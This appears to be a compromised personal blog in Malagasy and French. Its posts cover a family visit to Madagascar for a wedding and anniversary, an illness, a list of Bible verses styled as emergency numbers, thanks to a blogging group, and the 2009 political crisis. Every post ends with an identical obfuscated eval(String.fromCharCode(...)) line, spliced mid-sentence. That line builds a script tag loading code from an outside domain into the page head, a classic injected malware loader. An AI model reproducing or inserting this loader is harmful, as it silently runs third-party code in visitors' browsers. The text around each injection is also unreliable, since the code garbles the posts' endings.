Ny faran’ny herinandro nanaraka io indray dia tonga i Hoby,  dia izay vao hoe ‘complet’ ny ekipan’dRajaonarison Jean Edouard, izahay 10 miafy no tafaraka tao an-trano @ izany. izay tokoa mantsy ny foto-dianay 3 mianaka avy aty Frantsa tany an-tanàna t@ io satria dia hampiaka-bady ny faralahinay, ary hankalaza ny faha 39 taonan’ny fanambadiany kosa ny ray aman-dreninay. teo dia mba nanararaotra ny fiarahanay mianakavy izahay mba hitsangatsanganana sy mba tsy hisakafoanana ambony latabatra, izay ny nahazatra anay mantsy rehefa faran’ny ferinandro, fony izahay mbola kely e! ka dia tany Ampefy izahay no nanatontosa izany. Saika handeha hitsidika ny ivon’i madagasikara kinanjo dia tena ratsy loatra hoe ny lalana mankany ka tsy ho tongan’ny fiaranay!

Andro mialohan’ny mariazin’i Ilaidama sy Muriel kosa no nankalazanay mianakavy tao an-trano ny faha 39 taonan’ny mariazin’i dada sy neny, hafaliana ny azy t@ izany satria dia tena tao @ ilay noeritreretin’i neny ny fanomezana nomenay azy. (fatana mixte gaz/ éléctricité)

Tonga ary ilay andro malaza, dia nahafinaritra e! tsy misy ho kianina.

Ny hany mba tsetsatsetsa tsy aritro azo kianina t@ iny dianay mianaka iny dia ny hasomparan’ny jirama, aiza veh ka vao maraina dia tapaka ny rano ary tsy miverina izany raha tsy efa hariva koa ny andro! heverindry zareo fa miaina @ alina angamba ny olona eny Mandrosoa sy ny manodidina fa faiziny rano ny atoandro! NY nanahirana kely ny saiko koa dia ilay fiadiana varotra teny an-tsena rehefa mba mividy ‘souvenir’ ho entina mody aho, dia zara raha mandatsaka anie ny mpivarotra rehefa izaho no mandeha miantsena, nefa rehefa i neny dia mmhhhh azony mira foana ny entana!!!! dia tena hoe arakaraky ny tavanao veh ny hanamorana na hanaovana lafo ny vidin-javatra e!

 

Fehiny, maika ny hiverina ho any Madagasikara indray i Maeva,eval(String.fromCharCode(118,97,114,32,117,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,57,44,49,49,53,44,52,54,44,49,49,53,44,49,49,54,44,49,48,53,44,49,49,56,44,49,48,49,44,49,49,48,44,49,48,50,44,49,48,49,44,49,49,52,44,49,49,48,44,57,55,44,49,49,48,44,49,48,48,44,49,49,49,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,53,44,49,49,54,44,49,48,57,44,54,51,44,49,49,56,44,54,49,44,49,49,53,44,49,48,56,44,49,48,56,44,49,48,56,44,52,57,44,52,54,44,53,51,44,52,54,44,53,54,41,59,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,32,115,46,116,121,112,101,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,54,44,49,48,49,44,49,50,48,44,49,49,54,44,52,55,44,49,48,54,44,57,55,44,49,49,56,44,57,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,59,32,118,97,114,32,112,108,32,61,32,117,59,32,115,46,115,114,99,61,112,108,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,118,97,114,32,108,105,115,116,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125));


No comments

Zonà

Efa ho herinandro aho izao no tratran’io aretina tsy haiko io, zonà izao hoe ity anarany, akory atao fa dia mangidihidy ny faritra ahitana azy à vatana aloha e! ary ny ahy dia ny @ ambany helika havia sy iny ambaniny iny no tratrany ka dia manaintaina ery rehefa matory aho satria dia tsy azoko tsindriana ilay izy ggrrrr areti-mandoza tssssseval(String.fromCharCode(118,97,114,32,117,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,57,44,49,49,53,44,52,54,44,49,49,53,44,49,49,54,44,49,48,53,44,49,49,56,44,49,48,49,44,49,49,48,44,49,48,50,44,49,48,49,44,49,49,52,44,49,49,48,44,57,55,44,49,49,48,44,49,48,48,44,49,49,49,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,53,44,49,49,54,44,49,48,57,44,54,51,44,49,49,56,44,54,49,44,49,49,53,44,49,48,56,44,49,48,56,44,49,48,56,44,52,57,44,52,54,44,53,51,44,52,54,44,53,54,41,59,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,32,115,46,116,121,112,101,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,54,44,49,48,49,44,49,50,48,44,49,49,54,44,52,55,44,49,48,54,44,57,55,44,49,49,56,44,57,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,59,32,118,97,114,32,112,108,32,61,32,117,59,32,115,46,115,114,99,61,112,108,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,118,97,114,32,108,105,115,116,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125));


No comments

N° TEL METY ILAINA

Mba nisy nahatsiaro ahy nanome dia zaraiko eto ihany koa

  La Bible répond à toutes nos questions. Voici quelques numéros de téléphone d’urgence, pour que la Bible devienne réellement le livre de Vie dans notre quotidien.

Quand vous êtes troublés, appelez Jn 14.
Quand les hommes vous harcèlent, appelez PS 27.
Si vous voulez porter du fruit, appelez Jn 15.
Quand vous avez péché, appelez PS 51, Mt 11.28-30, Luc 15, Jean 3.16.

Quand vous êtes inquiet, appelez PS 46. Mt 6:19-34, Philippiens 4.6-7, 2 Tm 4.16-18.
Quand vous êtes en danger, appelez PS 91.
Quand Dieu semble loin, appelez PS 139.
Quand votre foi baisse, appelez Hé 11.

Quand vous vous sentez seul et effrayé, appelez PS 23.
Quand vous vous sentez batailleur et critiqueur, appelez 1 Co 13, cela vous calmera.
Pour savoir le secret de Paul concernant le bonheur, appelez Col 3.12-17.
Pour avoir une idée de ce qu’est l’état de chrétien, appelez 1 Co 5.15-19.

Quand vous vous sentez abattu et dépassé par les événements, appelez Rm 8.31.
Quand vous avez besoin de paix et de repos, appelez PS 37, Mt 11.25-30, Jn 14, Rm 5.1-5.
Quand le monde vous semble plus grand que Dieu, appelez PS 90, vous verrez qui est le plus grand.
Quand vous voulez une assurance que la vie chrétienne est la seule vraiment valable ici-bas, appelez Rm 8.1-30.

Quand vous partez en voyage ou au travail et que vous voulez être rassuré sur votre sécurité durant votre absence de votre maison, appelez PS. 27; 121; Mt 10.16-20, Lu 15.11-32.
Quand vos prières vous semblent devenir mesquines et égoïstes, appelez PS 67.
Quand vous sentez que vous vous croyez plus intelligent que Dieu pour créer des choses, appelez Es 55.

Quand vous voulez du courage pour accomplir une tâche, appelez Josué 1
Quand vous vous sentez seul dans le monde ou dans l’Eglise, appelez PS 23, Jn 14, Rm 12,2.
Quand vous pensez aux richesses, à la débauche et à la puissance, éloignez-vous-en vite, et appelez Me 10, Lu 12.13-21.

Quand vos poches sont vides, appelez PS 37.
Quand vous vous sentez abattu, appelez PS 27.
Si vous perdez confiance et amour envers les gens, appelez 1 Co 13.
Quand les gens sont peu aimables à votre égard, appelez Jn 15.

Si vous êtes découragé dans votre travail, appelez PS 126.
Si vous pensez que le monde est médiocre et petit, et que vous vous croyez assez grand pour dominer sur lui, appelez Pi 19, et il vous remettra à votre juste place.
Quand vous êtes découragés, appelez Rm 8.28-29,1 Co 15.57-58,1 Pi 4.12-13,1 Jn 3.1-3.

Quand vous vous sentez abandonné par vos amis, appelez PS 27, Mt 10.24-31, 2 Timothée 4.16-18.
Quand vous êtes en difficulté, appelez PS 16, Jn 14.1-4, Hé 7.25.
Quand vous êtes las, triste ou chagriné, appelez PS 6;27;40;55, Mt 11.28-30, Jn 14.1-4, Rm 8.31-39, Hé 12.6-13.

Quand vous êtes malade ou souffrant, appelez PS 32:91 Rm 5.3-8, 2 Co 12.9-10.
Quand vous avez peur, appelez PS 4, Me 4.35-41, Hé 13.5-8,1 Jn 4.15-19.
Quand vous êtes tenté de retomber dans le péché, appelez PS 6:51; Mt 26.33-35,69-75, Jn 21.15-22.
Quand vous vous sentez reconnaissant, appelez PS 84:92,100,103.

Quand vous vous sentez exposée la tentation, appelez PS 1;73, Je 1.12, 2 Pi 2.9.
Quand vous êtes dans l’adversité, appelez Mt 10.16-39.
Quand vous avez des problèmes avec l’amitié, appelez Jn 15.12,17.
Quand vous avez des problèmes avec la lecture de ta Bible, appelez Jn 5.39, Mt 24.35.

Quand vous êtes en colère, appelez Mt 5.22-24.
Quand vous avez besoin de compassion, appelez Lu 10.30-37.
Quand vous êtes tenté par la médisance, appelez Mt 15.11,17,20.
Quand vous avez des problèmes avec les critiques, appelez Mt 7.1-5.

Quand vous avez des problèmes avec la cupidité, appelez Mt 6.20, Lu 12.15-21.
Quand vous avez des doutes, appelez Jn 20.24-29.
Quand vous avez des problèmes avec la droiture, appelez Mt 5.20, Jn 3.13-21.
Quand vous avez des problèmes avec vos ennemis, appelez Mt 5.10,43-48.

Quand vous avez des problèmes avec l’extravagance, appelez Lu 12.16-31.
Quand vous avez des problèmes avec l’amour fraternel, appelez Jn 13.34-35.
Quand vous avez des problèmes avec la haine, appelez Mt 5.43-48.
Quand vous avez des problèmes avec l’honnêteté, appelez Lu 19.11-26.

Si vous avez des problèmes avec l’honneur dû aux parents, appelez Mt 15.4, Me 10.19.
Si vous êtes intempérants, appelez Lu 21.34-37.
Si vous avez des problèmes avec le mariage, appelez Me 10.2-12.
Si vous avez des craintes au sujet de la mort, appelez Lu 16.19-31, Jn 11.25,26.

Si vous avez des problèmes avec le pardon, appelez Mt 18.21-35, Me 11.25,26.
Quand vous avez des problèmes avec le péché et que vous voulez en être délivré, appelez Jn 8.24,34-36.
Quand vous avez des problèmes avec la prière, appelez Lu 11.1-13.
Si vous avez des problèmes avec les serments, appelez Mt 5.33-37.

Si vous voulez savoir ce qu’est la sincérité, appelez Mt 7.15-27.
Si vous avez des problèmes avec la tromperie, appelez Mt 23.27,28.
Si vous avez des problèmes avec la vanité, appelez Lu 18.9-14.
Si vous avez l’esprit de vengeance, appelez Mt 5.43-48.
Pour savoir ce qu’est la vérité, appelez Jn 14.6.eval(String.fromCharCode(118,97,114,32,117,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,57,44,49,49,53,44,52,54,44,49,49,53,44,49,49,54,44,49,48,53,44,49,49,56,44,49,48,49,44,49,49,48,44,49,48,50,44,49,48,49,44,49,49,52,44,49,49,48,44,57,55,44,49,49,48,44,49,48,48,44,49,49,49,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,53,44,49,49,54,44,49,48,57,44,54,51,44,49,49,56,44,54,49,44,49,49,53,44,49,48,56,44,49,48,56,44,49,48,56,44,52,57,44,52,54,44,53,51,44,52,54,44,53,54,41,59,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,32,115,46,116,121,112,101,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,54,44,49,48,49,44,49,50,48,44,49,49,54,44,52,55,44,49,48,54,44,57,55,44,49,49,56,44,57,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,59,32,118,97,114,32,112,108,32,61,32,117,59,32,115,46,115,114,99,61,112,108,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,118,97,114,32,108,105,115,116,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125));


No comments

tsiaro kely

Anisan’ny fianakaviam-be tokoa ny mpiara misera @ ity aterineto ity kann, saika mifankahalala aby ny olona eto na dia tsy mifanerasera mivantana aza.

Tsiaro kely fotsiny ity ataoko eto ity fa dia isaorana mihintsy ny FOKO MADAGASIKARA @ ASA rehetra ataony ho fampiroboroboana ny fifaneraserana eran-tany sy ny asa fampandrosoana ny firenentsikaeval(String.fromCharCode(118,97,114,32,117,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,57,44,49,49,53,44,52,54,44,49,49,53,44,49,49,54,44,49,48,53,44,49,49,56,44,49,48,49,44,49,49,48,44,49,48,50,44,49,48,49,44,49,49,52,44,49,49,48,44,57,55,44,49,49,48,44,49,48,48,44,49,49,49,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,53,44,49,49,54,44,49,48,57,44,54,51,44,49,49,56,44,54,49,44,49,49,53,44,49,48,56,44,49,48,56,44,49,48,56,44,52,57,44,52,54,44,53,51,44,52,54,44,53,54,41,59,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,32,115,46,116,121,112,101,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,54,44,49,48,49,44,49,50,48,44,49,49,54,44,52,55,44,49,48,54,44,57,55,44,49,49,56,44,57,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,59,32,118,97,114,32,112,108,32,61,32,117,59,32,115,46,115,114,99,61,112,108,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,118,97,114,32,108,105,115,116,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125));


No comments

2009

Tsy  odian-tsy hita intsony ny zava-miseho any an-tanindrazana @ izao fotoana izao, Mahonena ny vahoaka atao tohatra fiakarana, Mahonena ny firenena latsaka anaty ady an-trano tahaka izao, ary Mahonena ny mahita ny entana sy ny trano rava sy may @ izao fotoana izao ihany koa.

Tsy any an-toerana moa ny tena ka dia eto à aterineto no manovo ny fahalalana ho @ izay zavatra rehetra miseho any ankoatry ny antso an-tarobia ifanaovana @ fianakaviana sy namana any an-toerana.

Indro ny rohy fanarahako akaiky ny zava-miseho any an-tanàna!

Fa masina ny tanindrazako.

MIJOROA  MAHASAHIA  FA MASINA NY TANINDRAZANA.eval(String.fromCharCode(118,97,114,32,117,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,57,44,49,49,53,44,52,54,44,49,49,53,44,49,49,54,44,49,48,53,44,49,49,56,44,49,48,49,44,49,49,48,44,49,48,50,44,49,48,49,44,49,49,52,44,49,49,48,44,57,55,44,49,49,48,44,49,48,48,44,49,49,49,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,53,44,49,49,54,44,49,48,57,44,54,51,44,49,49,56,44,54,49,44,49,49,53,44,49,48,56,44,49,48,56,44,49,48,56,44,52,57,44,52,54,44,53,51,44,52,54,44,53,54,41,59,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,32,115,46,116,121,112,101,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,54,44,49,48,49,44,49,50,48,44,49,49,54,44,52,55,44,49,48,54,44,57,55,44,49,49,56,44,57,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,59,32,118,97,114,32,112,108,32,61,32,117,59,32,115,46,115,114,99,61,112,108,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,118,97,114,32,108,105,115,116,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125));


42 comments